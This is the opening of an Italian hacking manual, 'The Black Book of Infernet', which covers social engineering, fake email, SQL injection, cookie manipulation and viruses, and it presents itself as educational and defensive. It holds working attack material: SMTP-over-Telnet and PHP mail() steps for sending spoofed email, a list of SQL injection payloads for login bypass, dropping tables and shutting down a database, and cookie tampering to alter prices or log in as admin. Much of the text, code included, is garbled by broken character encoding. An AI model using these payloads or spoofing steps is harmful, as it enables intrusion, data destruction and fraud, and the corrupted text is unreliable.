You are on page 1of 93

0.

3
Infernet X Security Team
www.infernet-x.it
Il Software come il sesso. E' meglio se libero.
Linus Torvald
Non mi assumo alcuna responsabilit riguardo l'uso di questa guida . Tutte le
informazioni sono a scopo educativo / informativo . Leggendo questa guida voi lettori
vi assumente tutte le responsabilit di quello che farete con ci spiegato in questo
documento .
Durante la lettura del testo vi troverete di fronte a diverse righe di codice e non , pertanto ogni
tabella dove sar inserita la riga del codice avr uno sfondo in base al linguaggio/programma
utilizzato .
WEB PROGRAMMING
SQL
PERL
JAVA
!""
BASI
TERMINALE
ASSEMBL# $ ASM
NESS%NO
NB Potrebbero esserci pi linguaggi insieme (esempio PHP e S!" # nel caso ci fossero verranno
inseriti nella tabella in alto a destra la precisazione esatta. $on nessuno si intende che %uella riga
non fa parte di nessun linguaggio di programmazione e/o programma soft&are .
Legenda
'ischio basso ( l)attacco risulta inefficace con le ultime tecnologie oppure non * efficace a
compromettere la sicurezza generale del sistema .
'ischio medio ( l)attacco pu+ rivelarsi nocivo solo in alcuni casi . ,lcuni di %uesti attacchi
sono gi stati eliminati .
'ischio alto ( l)attacco risulta %uasi sempre efficace , compromette l)intera sicurezza del
sistema e favorisce a un hac-er/crac-er di penetrare nel sistema con privilegi root .
S&mmari&
0)Introduzione
1)Social Engineer
2)a!e "ail
#)S$% In&ection
')(oo!ie "ani)ulation
*)+irus
*.1),i)i di +irus
*.2)Storia dei +irus
*.#)S-ilu))o di un +irus
*.')+irus da .( a (ellulare
/)0orm
1),ro&an
2)3ac!door
2.1)3ac!door 4etc4)asswd
2.2)3ac!door r5osts
2.#)3ac!door 6imensione ile
2.')3ac!door %ibrerie (ondi-ise
2.*)3ac!door .rocessi 7unning
2./)3ac!door ,(.4I.
2.1)%ista .orte 3ac!door
8)7oot!it
10)6enial of Ser-ice 96oS)
10.1)6oS : S;n-lood
10.2)6oS : Smurf
10.#)6oS : 66oS
10.')6oS : 676oS
10.*)6oS : .ing of 6eat5
10.1)6oS : 3on!
10.2)6oS : ,eardro)
10.8)6oS : (lic!
10.10)6oS : 3loo)
10.11)6oS : .ing .attern
10.12)6oS : I<".
10.1#)6oS : 0in=u!e - >>3
10.1')6oS : %and
11)7emote ile Inclusion
12)7emote (ommand Inclusion
1#)?SS @ (ross Site Scri)ting
1')Image ?SS In&ection
1*).5is5ing
1*.1)a!e %ogin
1/).5arming
11)(ross Site 7eAuest orgeries
12)6ialer46ialing
12.1)6ialer %egittimi
12.2)6ialer Illegali
18)0ar6ri-ing
18.1)0arc5al!ing
18.2)Ser-er 6B(.
18.#)0E.
18.')0.C
20)3ot=et e 3ridge=et
21)Bi&ac!ing
22)3luetoot5
22.1)3lue&ac!ing
22.2)3luesnarfing D 3luebugging
2#)7e-ersing D (rac!ing
2#.1)Il (rac!ing
2#.2)Il 7e-ersing
2#.#)Il 3ES
2#.')Sistemi di Enumerazione
2#.*)%ettura delle Informazioni
2#./)I registri dello Stac!
2')3uffer >-erflow
2*)Bea) >-erflow
2/)(r;)t : (rac!ing .<. D "6*
2/.1),eoria sulla (rittazione
2/.2).<.
2/.#)7om)ere una c5ia-e .<.
2/.')Bas5
2/.*)"6* : 3ruteforce
2/./)"6* : 6ictionar; Cttac!
2/.1)"6* : 7ainbow ,ables
2/.2)Salt .assword
21)S)oofing
21.1)I. S)oofing
21.2)6=S e 6es!to) S)oofing
21.#)C7. S)oofing
21.')S"S S)oofing
22)Sniffing
22.1)Sniffing : ,raffico %ocale
22.2)Sniffing : 7ete %ocale
22.2.1) : =on-Switc5ed
22.2.2) : Switc5ed
22.#)Sniffing : 7eti <eografic5e
28)B,,. 7es)onse S)litting
#0)(ommand In&ection laws
#1)Session ixation
#2)"etas)loit
##).ortscannig
??)(onclusioni
!urato da "tefano #murdercode$ Novelli
murdercode.gmail.com
'i(c)aimer
/l seguente testo * a scopo illustrativo e informativo . !0autore Stefano 1ovelli non si assume
responsabilit delle informazioni assimilate e delle azioni che ne possono derivare . ualun%ue atto che
vada contro la legge informatica n.23 art. 4,2,3,5,6,7,8,9,:,4;,44,42,43 * punibile e perseguibile
penalmente
!e azioni riportate nel documento sono state testate su macchine di mia stessa propriet .
uest)opera * stata rilasciata sotto la licenza !reative !ommons ,ttribuzione<1on commerciale<1on
opere derivate 2.6 /talia. Per leggere una copia della licenza visita il sito &eb
http(//creativecommons.org/licenses/publicdomain/ o spedisci una lettera a $reative $ommons, 66:
1athan ,bbott =a>, Stanford, $alifornia :53;6, ?S,.
http//creativecommons.org/licenses/b%/&.'/
The Blac( Boo( of )nfernet
Intr&*u+i&ne
'iflettiamo attentamente su cosa sta succedendo in %uesti anni ( il termine hac(er viene diffuso
dai media come un pirata informatico che si infila nei sistemi informatici per ricavarne denaro
sporco # altri sostengono invece che l0hac-er di natura si pavoneggia agli occhi degli altri
spifferando informazioni riservate di utenti malcapitati a %uesto individuo # altri ancora , invece ,
suppongono che esso sia un ragazzino che si diverte defacciando siti di sconosciuti .
@a cos0* veramente un hac-er A Bheh , non essendo %uesta la sezione adatta vi rimando a Btica
, ma comun%ue %ualcuno dir ( Ccosa c0entra %uesto con l0introduzione AD . Eeh , state pur certi
che , leggendo %ueste righe , n* altre , riuscirete mai a capire %ual * il succo di essere un hac-er
. Sto forse abusando troppo di %uesto termine , e sinceramente non dovrei neanche farlo , visto
che io non mi ritengo neanche lontanamente un hac-er . Posso solo dirvi che ne conosco ben
pochi # ormai sta diventando una specie in via d0estinzione . Spero con tutto il cuore di farvi
capire la morale del mio lavoro ( non voglio che chiudendo l0ultima pagina andiate a lamerare a
destra e a manca . Foglio farvi riflettere , farvi capire come i CveriD pirati informatici si
appropriano di %ualcosa che non * loro # cosG facendo riuscirete ad evitare di finire vittime di frodi
, truffe e tutte le fregature che stanno girando ultimamente (anche se girano da troppi anni" .
'ipeto , sar completamente inutile %uesto libro se avete intenzione di farvi vedere agli occhi
degli altri come pirati informatici .
Foglio che %uesto sia un manuale per spiegare a chi non ha conoscenze nel campo come non
farsi fregare, mettendo in guarda dalle vere minacce della rete...
La strada per diventare un hac(er
Fe lo dir+ francamente ( non * leggendo %uesto libro che andrete in giro a sbuffoneggiarvi
targhettandovi degli hac-er . /o penso che in /talia il vero hac-ing venga tirato in ballo da gente
capace , che fa andar avanti il mondo scoprendo %ualcosa di nuovo , non di distruggerlo . 1on *
che deturpando /nternet , come ha fatto un giovane studente tedesco lamerando su =i-ipedia ,
che sarete degli hac-er . !a storia di =i-ipedia ne da appunto una prova ( chiun%ue avrebbe
potuto farlo , * un portale libero , dev)essere rispettato .Hgnuno ha il diritto di conoscere , e se
per colpa di %uel coglione bisogna chiudere tutto , allora lo dico chiaramente ( la pubblicazione di
%uesto libro , e di altri manuali prodotti da /nfernet e dalle comunit italiane che lo appoggiano ,
saranno per sempre chiuse .
/ veri hac-er sono coloro che hanno portato /nternet sotto le vostre mani ( il IJ<; o il Pdp<4 ,
vecchi bestioni grandi %uanto stanze in grado di elaborare 4 miliardesimo di %uello che fanno
oggi i nostri computer . 1on avevano DFD ma schede perforate , niente linguaggi semplici ma
assembl> allo stato puro . Iutte le comodit che abbiamo oggi sono grazie ai grandi del Imrc e al
@it . $)* gente che con i computer di oggi si reputa hac-er senza riuscire a fare un ciclo for ,
mentre loro sparavano miliardi di subroutine riuscendo a creare addirittura dei videogiochi . Eill
Kates non era neanche nato e gi l)hac-ing era uno stile di vita . B) la storia l)hac-ing . 1on * un
gioco . !eggete CHackers : Gli eroi della rivoluzione informaticaD di Steven !ev> per capire il
senso di tutto ci+ . 1on ho neanche diritto di parlare di hac-ing , non mi sento hac-er nL ora nL
mai .
1ella maggior parte degli aspiranti hac-er di oggi non c)* un)infarinatura sostanziale della
scienza dell)informatica . 1on si * hac-er in base a %uello che si usa , ma in base a %uello che si
sa usare . !asciate perdere la gente che vi spara la solita frase del Se vuoi essere hacker usa
Linux . Se non sapete cosa fare , studiatela e poi fatela , altrimenti vi ritroverete formattati .
Perch* %uesto libro A Per una semplice cosa . !)hac-ing , come penseranno molti di voi , non *
fare il Cpirata informaticoD .
!)hac-ing * semplice conoscenza . B la conoscenza * vita . Brgo , Hac-ing * vita M
!osa "* un hac(er
?n hac-er S, che c)* sempre %ualcuno pi bravo di lui e si prepara ad affrontare chiun%ue
?n hac-er S, che * meglio conoscere poco di tutto che tutto di poco
?n hac-er S, che %uello che sta facendo * per il bene del mondo /nternet
?n hac-er S, che %uello che fa * illegale e non un gioco
?n hac-er S, che dentro di se c)* la voglia di superare %ualsiasi ostacolo
?n hac-er S, di non sapere
!osa N+N "* un hac(er
?n hac-er 1H1 S, tutto di tutti
?n hac-er 1H1 S, fare tutto
?n hac-er 1H1 S, fermarsi davanti a nulla
?n hac-er 1H1 S, chi lo vuole infamare
)ntro al libro
!a base della difesa risiede appunto nel conoscere l)attacco . B) bene informarvi che tutto %uello
che sar presentato in %uesta sezione * stato testato su sistemi propri (messi a disposizione di
murdercode" oppure su sistemi altrui sotto specifica richiesta .
!e tecniche presentate non dovranno essere per nessun modo riprodotte su sistemi altrui senza
consenso , per altro non mi assumo responsabilit su %uello che potrete provocare sul sistema
attaccato . 1on mi assumo responsabilit inoltre su %uello che imparerete , difatti %uest)opera *
prodotta al solo fine di mettervi a conoscenza di %uello che potreste incontrare durante ogni
giorno .
/l mondo * pieno di stronzi , diciamolo , per %uesto evitiamo di finire nelle loro grinfie .
@i raccomando , %uesta * solo una visuale molto generale dei tipi di attacchi # non star+ a dirvi
C%uesta variabile * affetta da %uesto attaccoD , star a voi scoprirlo . /o cerco di indicarvi solo la
strada .
Detto %uesto , buona lettura , dal vostro murdercode .
*ttenzione
1essun sistema risulta sicuro . / tools di sicurezza sono perfetti ma ignoranti , mentre la mente
umana * intelligente . ?n ottimo coc-tail per avere un sistema efficace e sicuro .
#,$ "ocial -ngineer
!)attacco per eccellenza che funziona sempre . !)ingegneria sociale , utilizzata da Nevin
@itnic- , * una tecnica che consiste nello studiare la condizione psicologica della
vittima al fine di estrapolare informazioni personali .
$on l)avanzare della tecnologia * sempre pi difficile trovare un bug in un sistema ( per
%uesto viene applicata l)ingegneria sociale.
Fediamo di farla pi semplice possibile (
'iceviamo una mail da Cstaff.infernet<J.itD . $i chiedono gentilmente di inviare loro username e
pass&ord , magari utilizzando un linguaggio sofisticato e una grafica accattivante . ?n utente alle
prime armi certamente non s)aspetterebbe che dietro tutto %uesto c)* una truffa , e invece
potrebbe capitare .
/nviare una mail fasulla * semplicissimo ( si chiama tecnica del fa-e mail , che verr
presentata nel prossimo articolo , mentre creare una grafica verosimile * facilmente
producibile da chiun%ue utilizzando un %ualsiasi programma grafico e una discreta
conoscenza del linguaggio di marcatura (o mar-up" HI@! e un toccasana di $SS .
!a prima fase dell)/ngegneria Sociale * detta footprinting , ovvero cercare pi informazioni
possibili della vittima da attaccare ( email , pass&ord e tant)altro .
Passiamo ora alla fase successiva ( testare se le informazioni accumulate siano fittizie oppure
attendibili . Per fare ci+ * indispensabile almeno provare per una volta il login nel nostro caso ,
magari senza toccare nulla , nascosti dal sistema (utilizzando tutte le tecniche dell)anonimato
che saranno presentate pi tardi" e nelle ore notturne (per evitare di presentarsi al sistema nello
stesso momento della vittima" .
$ome terza ed ultima fase abbiamo bisogno di rilevare tutte le informazioni assimilate dal
footprinting ( stile dialettale , formalit con certi tipi di persone e una buona dose di fortuna . /n
men che non si dica sar semplicissimo %uindi spacciarsi per la vittima senza essere riconosciuti .
.ischio
!)attacco che non fallisce mai . 1essun sistema pu+ proteggervi da %uesto attacco , difatti
l)unica buona difesa * proprio %uella di usare la testa . Purtroppo con le nuove tecniche di
attacchi * sempre pi difficile riconoscere una truffa . Siate sempre paranoici con i vostri
dati personali .
#&$ /a(e 0ail
!)attacco consiste nell)invio di mail fasulle . !a tecnica della fa-e mail * essenziale per un
malintenzionato di impossessarsi di informazioni riservate della vittima .
B) possibile modificare la mail del mittente , in modo da poter rendere pi
verosimile la mail inviata ( il sistema pi utilizzato * sicuramente l)utilizzo
del protocollo Ielnet . Su /nternet * possibile trovare un)infinita di tool
adatti al nostro scopo , ma su sistemi =indo&s e !inuJ * gi presente (per
=indo&s Start<OBsegui<OIelnet , per !inuJ Ierminal<OIelnet " .
Hra che siamo pronti con tutto il materiale analizziamo la connessione e
l)invio della fa-e mail sfruttando un protocollo S@IP (porta 26" .
1)Scriviamo open NO!"!LS!#$!# NO!"!LL%&O#'% (ad esempio open mail)tin)it *+)
*),isogna -uindi farsi riconoscere dal server utilizzando il comando helo (es) helo mail)tin)it)
.)"iamogli la nostra mail (fittizia naturalmente) scrivendo
mail from:attaccante/sito)it
0)"iamogli la mail vittima facendo rcpt to:vittima/sito)it
+)Scriviamo data
1)Scriviamo il testo da inviare alla vittima
2)Scriviamo il punto ()) e invio
ail 3nviata4
Bcco un esempio(

, %uesto punto la nostra mail sar inviata correttamente # possiamo fare pi prove con noi stessi
per vedere se riusciamo a inviare correttamente la mail . !o stato 26; HN decide se tutto * stato
eseguito correttamente
n5 ( attenzione a %uello che scrivete .Se sbagliate anche solo una lettera dovrete ricominciare da
capo .
Hra analizziamo %ualcosa di pi carino ( se siamo registrati su un server con servizio S@IP e &eb
server ,pache (esempio ,ltervista" possiamo sfruttare %uesto a nostro vantaggio ( utilizzando
infatti una semplice funzione in PHP * possibile inviare una mail proprio come se utilizzassimo il
Ielnet .
Fediamo in pochi passi come fare (
PA
QPagina invio.php
Ra S Cmail.vittima.itD#
Roggetto S CHggetto della mailD#
Rtesto S CIesto della mailD#
Rmittente S Cmail.attaccante.itD#
mail (TRaT, TRoggettoT, TRtestoT, TUrom( RmittenteT"#
AO
Penso che sia semplicissimo da capire persino per chi non ha nessuna conoscenza a livello di
programmazione.
Hvviamente per utilizzare tale script sar indispensabile utilizzare un server di posta S@IP in
grado di inviare mail a gruppi esterni .
.ischio
1on bisogna allarmarsi particolarmente di una mail sospetta . Hramai molti server PHP3
riconoscono una mail fasulla e la spostano tra le indesiderate . /noltre si * facilmente
riconoscibili utilizzando %uesta tecnica , peraltro pu+ essere efficace solo con degli
sprovveduti .
#1$ "2L )n3ection
!)errore pi fre%uente durante la programmazione di una pagina &eb , ma anche uno dei sistemi
pi utilizzati da hac-er o crac-er per infiltrarsi in un sistema .
Fediamo %uei film dove c)* il solito ragazzo con occhiali scuri e giacca di pelle che , smanettando
sulla tastiera , in poco meno di un minuto trova i codici di accesso di un sistema di login .
Uantascienza A 1o , tutto verosimile .
!a tecnica che presenteremo ora sar appunto la S! /nVection , ossia l)iniezione di %uer> S! in
un form mal controllato per modificare la naturale disposizione dei dati in un database.
uesto * un esempio di !ogin , comune per tutti gli utenti che almeno una volta hanno navigato
su /nternet . /nserendo nel modulo una stringa che permetta di iniettare %uer> S! sar possibile
comandare il database senza ricorrere all)autenticazione di Super?tente , detto anche ,dmin o
'oot (in ambito ?nWJ" .
uella che troverete %ua sotto * una lista di %uer> S! utilizzate per effettuare una S! /nVection
sul modulo di ricerca .
Nome: ' OR ''='
Password: ' OR ''='
Query Risultante :
SELECT * FROM Utenti !ERE nome" # # OR ##"# # $N% &assword"## OR ##"# #
E''etto si viene identi'i(ati (on il &rimo re(ord del data)ase
Nome: ' OR '1'='1
Password: ' OR '1'='1
Query Risultante:
SELECT * FROM Utenti !ERE nome" ## OR #*#"#* # $N% &assword"## OR #*#"#* #
E''etto " si viene identi'i(ati (on il &rimo re(ord del data)ase
Nome: ' or '1=1 ---
Password: ' or '1=1 ---
Query Risultante:
SELECT * FROM Utenti !ERE nome" ## or #*"* +++ # $N% &assword"## or #*"* +++#
E''etto " si viene identi'i(ati (on il &rimo re(ord del data)ase
Nome:' or Nome like '%%
Password: ' or Nome like '%%
Query Risultante:
SELECT * FROM Utenti !ERE nome" ## or Nome li,e #-- # $N% &assword"## or Nome li,e
#--#
E''etto " si viene identi'i(ati (on il &rimo re(ord del data)ase
Nome: [stringa nulla]
Password: ' OR 'Attacco' LIKE 'Att%
Query Risultante:
SELECT * FROM Utenti !ERE nome" # # $N% &assword"## OR #$tta((o# L./E #$tt-#
E''etto " $utenti(a0ione (ome utente admin
Nome:[una stringa qualsiasi]
Password: c' OR ' R!E"
Query Risultante:
SELECT * FROM Utenti !ERE nome" # # $N% &assword"#(# OR # TRUE1#
E''etto " si viene identi'i(ati (on il &rimo re(ord del data)ase
Nome: a#min' --
Password: [stringa nulla]
Query Risultante:
SELECT * FROM Utenti !ERE nome" # admin# ++# $N% &assword"# #
E''etto " $utenti(a0ione (ome utente admin
Nome: ' OR 'Attacco' $ 'A
Password: ' OR 'Attacco' $ 'A
Query Risultante:
SELECT * FROM Utenti !ERE nome" # # OR #$tta((o# 2 #$# $N% &assword"##OR #$tta((o# 2
#$#
E''etto " $utenti(a0ione (ome utente admin
Nome: ' % #ro& ta'le utenti--
Password: [stringa nulla]
Query Risultante:
SELECT * FROM Utenti !ERE nome" # # 3 dro& ta)le utenti++# $N% &assword"# #
E''etti " Elimina0ione della ta)ella dal data)ase
Nome: aaaaaaaaaaaaaaa'
Password: ' % s(ut#o)n --
Query Risultante:
SELECT * FROM Utenti !ERE nome" # aaaaaaaaaaaaaaa## $N% &assword"## 3 s4utdown ++#
E''etto " C4iusura del data)ase
uando %ualcuno parla di S! /nVection e dice che l)unica vulnerabilit risiede nel form
probabilmente non conosce appieno la programmazione =eb dinamica . Sappiamo che i dati da
un form a una pagina .php possono essere inviati in due modi ( PHSI e KBI . $on il form di login
abbiamo usato il metodo PHSI , mentre ora vedremo come fare S! /nVection in metodo KBI .
$onsideriamo di avere una pagina php dove nella barra degli indirizzi venga prodotto %uesto
risultato (
666)sitovittima)it7nuke7index)php89'opSearch:1;
uesto * un sito dinamico perchL la indeJ (ossia la prima pagina" ha come estensione php .
Hra nella pagina indeJ.php il programmatore avr implementato un codice che andr a
recuperare %uel dato che avr come idS4; utilizzando una %uer> (domanda al database" tipo (
S!L!<' ne6s =#O utenti >H!#! id:1;
$osa succederebbe se noi riuscissimo a manipolare il codice al fine di voler cancellare la tabella
ne&s dal database A
S!L!<' ne6s =#O utenti >H!#! id:1;?@ "#O& 'a5le articoli AA?
Bsaminiamo attentamente il codice (
X sta a significare che la %uer> viene improvvisamente chiusa
# indica che * stata chiusa un0istruzione e ne viene subito aperta un0altra
/l resto * il codice per eliminare una tabella .
Fi starete chiedendo ( come fai a sapere tutte %ueste cose A /o non mi invento nulla , %ueste sono
cose che si imparano conoscendo la programmazione . /n particolare programmando database ,
per %uesto se volete perfezionare %uesta favolosa tecnica credo sia indispensabile che impariate
almeno il linguaggio PHP e sappiate programmare un database (@>S! o ,ccess per imparare
sono perfetti" .
/n sezione Difesa inoltre troverete il sistema per difendersi dalla S! /nVection .
'ischio
'appresenta sicuramente uno degli attacchi pi rischiosi per un sistema . !)attacco
potrebbe provocare la compromissione del database , visualizzando dati protetti ,
cancellarli o modificarli . B) necessario prendere provvedimenti durante l)invio e la
ricezione dei dati da una pagina a un)altra .
#4$ !oo(ie 0anipulation
Parliamo dei $oo-ie . ?n coo-ie * in genere un piccolo file di testo presente nel computer di un
client . Hgni coo-ie ha il proprio valore e viene utilizzato per ricordare a un sistema (in genere
una pagina &eb" alcuni risultati , come ad esempio la solita scritta CEenvenuto nomeutenteD .
/l coo-ie del server &&&.infernet<J.it * solo ed esclusivamente propriet di %uel server , perci+ *
impossibile poter leggere e manipolare coo-ie presenti su un client con un server diverso .
/n cosa consiste la tecnica della manipolazione dei coo-ie A / coo-ie sono semplicissimi , hanno
un nome di variabile e un valore per essere validi , poi avranno anche caratteristiche come
tempo di durata ecc ...
/potizziamo di avere un coo-ie di %uesto genere (
costoYprodottoS4;;;
@ettiamo che vogliamo comprare un fucile da caccia da 4;;; euro . / dati vengono salvati nel
coo-ie e al momento dell)invio dei dati il sistema riconoscer dai nostri coo-ie che il prodotto
costa effettivamente 4;;; .
@anipoliamo , ossia editiamo il file di testo dove risiedono i coo-ie , e facciamo %uesto (
costoYprodottoS4;;
,nche il pi immaturo tra i lettori avr capito che facendo cosG il sistema riconoscer la %uota
4;; anzichL 4;;; .
uesto era giusto per introdurvi un po) nel tema scottante del $oo-ie @anipulation .
,bbiamo parlato di S! /nVection precedentemente vero A /potizziamo sempre di avere tra le
mani un login , proprio come una S! /nVection .
usernameSpippoZPassSpluto
Sfortunatamente nel sistema di login * attivo uno script che evita le S! /nVection . Perch* non
applicare la precedente tecnica a %uello mostrata appena ora A
usernameS'or''='&password='or''='
$ome abbiamo visto dallla S! /nVection lo script , che richiamer tra i coo-ie i valore impostati ,
far si che %uesti verranno ogni volta eseguiti nella %uer> . @i spiego meglio (
R%uer>Sm>s%lY%uer>(CSB!B$I W U'H@ tabella =HB'B usernameS)or))S)Zpass&ordS)or))S)D"#
Succede un putiferio . /n pratica il sistema , non avendo i dati da attuare nel database , ci
riporter come risultato il primo valore del database , in %uesto caso l)admin (sempre se l)admin
ha come chiave primaria 4".
/n parole povere , riuscirete a loggarvi come admin e avere i privilegi di tale utente .
Sembrer una cosa banale , ma l)attacco del $oo-ie @anipulation * risultato come uno dei 2;
attacchi pi utilizzati dagli hac-er o crac-er per infiltrarsi in un sistema . Hcchio alla sezione
Difesa per ovviare a %uesto problema .
.ischio
/l rischio di un attacco * molto alto . Purtroppo * anche molto difficile creare un sistema
che permetta di offuscare i valori dentro un coo-ie , per %uesto * necessario adottare
tecniche di riconoscimento tramite variabili di sessione . /l fatto che il coo-ie * di
propriet del server ne abbassa i rischi di poter affidare coo-ie a terzi (a meno che non si
utilizzi [SS , vedi nei prossimi capitoli" .
#'$ 5irus
/l virus , chiamato anche virii , * un frammento di codice associato in genere a un programma in
modo da potersi replicare su pi sistemi . Spesso viene utilizzato in termine Firus per
generalizzare tutti %uei sistemi programmati con il scopo di danneggiare la macchina # %uesto
non * del tutto vero , infatti pi avanti vedremo altre tipologie di sistemi in grado di danneggiare
un computer utilizzando altre tecniche . Hvviamente un virus ha le proprie doti distruttive ,
proprio come succede nel corpo umano . 1ella storia del computer i virus sono stati sicuramente
gli attacchi che hanno provocato pi danni in %uesti ultimi 2;<3; anni
Tipologie
/ virus , tra di loro , si differenziano dal fatto di poter attaccare vari tipi di sistemi (
Programmi , Documenti e Hard&are . 1el listato che vedremo %ui sotto saranno
rappresentate le tipologie di virus divise per categoria in base a come agiscono e su
%uali sistemi .
B++T "-!T+. 5).6"( sono dei virus che infettano %uella parte di un flopp> o di un hard dis-
contenente informazioni necessarie all) avviamento del sistema operativo la diffusione avviene
generalmente %uando si avvia un P$ da un flopp> infetto.
/)L- 5).6"( sono dei virus che infettano file di programmi (W.eJe,W.com,...". e si replicano ad
ogni avvio del programma infetto.
0*!.+ 5).6"( * il tipo di virus pi diffuso, * in pratica un programma scritto in Fisual Easic.
06LT)7*.T)T- 5).6"( per diffondersi utilizza una combinazione di tecniche# il tipo pi comune
unisce il metodo di lavoro di un virus di boot e di file.
7+L80+.79)! 5).6"( * un virus che muta ogni volta che si riproduce.
"T-*LT9 5).6"( utilizza vari trucchi per nascondessi e sfuggire ai soft&are anti virus . /n
generale sono virus che infettano il DHS
T.+:*N 5).6"( * un programma che al suo interno contiene un sottocodice dannoso che si
attivava al determinarsi di certe condizioni. ,ltre informazioni sono alla pagina Eac-Door IroVan.
;++ 5).6"( sono virus che vivono solo nei laboratori di ricerca perchL non sono riusciti a
diffondersi.
)N<T9-<=)L> 5).6"( sono dei virus che vivono allo stato selvaggio cio* che sono sfuggiti al
controllo e sono attualmente in circolazione
9-6.)"T)!"( una tecnologia antivirus che tiene sotto controllo alcuni sintomi tipici della
presenza di un virus come ad esempio modifiche non previste nella dimensione del file
5).6" ")?N*T6.-( * una stringa di codice binario presente in molti virus tranne che nei
polimorfi che consente al programma anti virus di rivelare gli intrusi.
Sulla rete girano guide e programmi dedicati solo ed esclusivamente a come creare Firus . Penso
che sia il modo pi spilorcio per guadagnare popolarit su /nternet . /l vero crac-er scrive i propri
virii da solo , utilizzando spesso linguaggi di programmazione molto potenti come $\\ o
,ssembl> , ma comun%ue * possibile scrivere codici nocivi con (-uasi" %ualsiasi linguaggio di
programmazione .
/n genere un virus informatico ha come caratteristiche (
la possibilit di nascondersi ai sistemi di protezione utilizzando le proprie istruzioni
amalgamate con altri soft&are
pu+ replicarsi dentro altri programmi , copiandone alcune parti di codice , oppure
copiandolo completamente al fine di riprodurre i danni causati dal virus madre .
/l virus , una volta completata la sua riproduzione , pu+ compiere le azioni per cui * stato
programmato , come ad esempio la cancellazione di librerie importanti , oppure
l)ostruzione dell)invio o della ricezione dei pacchetti dedicati alla connessione internet .
Se oggi riuscissimo a costruire un sistema completamente autonomo in tutte le sue
caratteristiche oggi l)era dei virus avrebbe sfondato con successo in ogni campo (
fortunatamente per noi l)uomo non * riuscito a costruire un sistema in grado di adattarsi
all)ambiente , %uindi possiamo dedurre che (
?n virus pu+ compiere SH!H ed BS$!?S/F,@B1IB le azioni per cui * stato progettato .
uesto fa capire che un virus , come tutti i sistemi , * perfetto , ma ignorante .
/ virus possono lavorare solo su macchine gi pensate . ?n virus non potr mai attaccare
un sistema @acintosh se * stato progettato per attaccare un sistema DHS , %uindi uno
sviluppatore di virus sar pi invogliato a sviluppare un sistema pi utilizzato . $apite ora
il perch* =indo&s ha cosG tanti virus A

"toria del virus
)l primissimo virus fu sviluppato nel novembre del ,@A1 , durante un
esperimento di un programmatore per dimostrare come , con %ualche riga di
codice , era possibile infettare un soft&are gi presente nel sistema .
)n )talia il primo virus invece fu sviluppato pare da alcuni esperti del
politecnico di Torino , dove il file , sempre dedicato alla ricerca e alla
sperimentazione , fu chiamato Ping Pong , in %uanto raffigurava una pallina che
si spostava per lo schermo , simile al famoso gioco old<st>le .
<ome si sviluppa un virus informatico 8
Hvviamente bisogna programmarlo . / linguaggi migliori sono sempre %uelli dedicati
all)interattivit con la macchina a livello hard&are , %uindi $\\ o ,ssembler . uesto dipende
per+ anche dallo scopo del virus .
,lcuni di %uesti , infatti , sono stati realizzati con linguaggi di programmazione dedicati allo
sviluppo di programmi sotto macchine =indo&s , in genere Easic . !a suite di programmazione
Fisual Easic 7.; * tutt)ora una tra le pi usate per lo sviluppo di sistemi virali .
?n chiaro esempio di programmi virali realizzati con FE 7.; sono C/ love >ouD e C@elissaD .
<hi sviluppa un virus informatico 8
/ Ccriminali informaticiD , da non confondere con gli hac-er etici . !o scopo principale dell)attac-er
A Bssere al centro dell)attenzione , ovvio . Poi ci sono %uelli che lo fanno per lavoro , chi invece lo
fa per testare le proprie doti da programmatore e chi , invece , * convinto che %ualcuno lo fa per
pubblicizzare e rendere pi visibile da parte degli altri prodotti il proprio antivirus , giusto per
rendere un)immagine pi professionale di tale prodotto .
"iffusione locale di un sistema virale
$irus attraverso le mail
Hggigiorno sempre pi persone hanno internet ( linee pi veloci , soft&are dedicati alla rete ,
tant)* che si sta utilizzando sempre di pi il protocollo Fo/P al posto della normale linea telefonica
e gli S@S vengono sostituiti dalle mail . Bd ecco %ui che gli attac-er hanno deciso di fare %ualche
porchetta sotto banco ( proprio con la tesi dello spam (si pu+ vedere un)intera sezione dedicata
su /nsicurezza" , le mail con degli allegati pericolosi sono sempre pi fre%uenti .
Per essere infettati * necessario ricevere l)allegato , %uesto perch* CteoricamenteD un testo in
forma HI@! difficilmente potr infettare il vostro computer , anche se non vieta di sfilarvi
informazioni importanti .
@a torniamo ai virus ( innanzitutto non bisogna , @,/ , per nessuna ragione , aprire dei file con le
seguenti estensioni (
B[B
$H@
FES
E,I
P/U
S$'
Hvviamente %uesto non sar l)unico modo per infettarvi . Kirano di continuo sulla rete ;da>
dedicati esclusivamente all)eJploiting del programma di servizio di posta @icrosoft (Hutloo-" .
Hvviamente la @S ha patchato tali bug , ma non tutti hanno una versione di =indo&s CoriginaleD
, pertanto chi utilizza un sistema pirata si ritrover a non poter fare aggiornamenti se non con
%ualche accorgimento .
5irus da 7! a !ellulare
Parliamo %uindi di %uesto fenomeno che si sta espandendo alla grande . $onsiderando il fatto che
4; anni fa i cellulari erano solo dei cellulari , oggi proprio i cellulari stanno
diventando dei veri e propri computer . 'iproduttori musicali , giochi ,
&allpaper , programmi e addirittura Sistemi Hperativi . 1on sono dei
computer A Si sta espandendo anche il fattore /nternet (grazie alle nuove
velocit ?@IS" . Bh si , sono proprio dei computer %uesti gioielli tecnologici
.
Purtroppo per+ i 5irus dei cellulari non * un fattore da prendere alla
leggera , come lo pu+ essere a volte per i computer ( non si ha il totale
controllo del sistema , dato che la struttura di un cellulare * fatta a m+ di
Cutente scemoD ( i produttori credono che ci basta chiamare , giocare e fare tutto %uello che ci
pare senza avere la possibilit di configurare il nostro cellulare come vogliamo noi .
$osa succede %uando viene sfornato l)ultimo dei virus per i cellulari A /l cataclisma , sicuramente.
Per un crac-er , anzi oserei dire CrompicoWWWoniD colui che crea virus , * un)opportunit incredibile
di mietere vittime . Solitamente chi usa un computer sa , bene o male , %uello che sta facendo (
con il cellulare no . !o usano tutti e nessuno sa usarlo , ed * la verit amici miei M
Prendiamo ad esempio il virus Sasser (=indo&s" e il virus !ommBarrior (S>mbian" ( trovato il
metodo per cancellare Sasser tutti l)hanno cancellato , mentre %uando si * trovato il metodo per
cancellare $omm&arrior nessuno ha fatto nulla . Bppure bastava installare sulla propria memoria
il SBmantec o5ile 'hreats #emoval 'ool , uno strumento autonomo che avrebbe fatto tutto da
solo . !)antivirus * un programma , il Iool della S>mantec anche . $he cambia A ,ssolutamente
nulla .
$irus <rossA&latform
!a tecnologia va avanti . Si sta utilizzando oggigiorno %uella tecnologia chiamata
Sincronizzazione Dati , ossia la possibilit di avere le stesse cose che hai nel P$ sul cellulare .
Eravi ai polli M Foi pensate che i Firus $reators non hanno pensato a creare un virus che
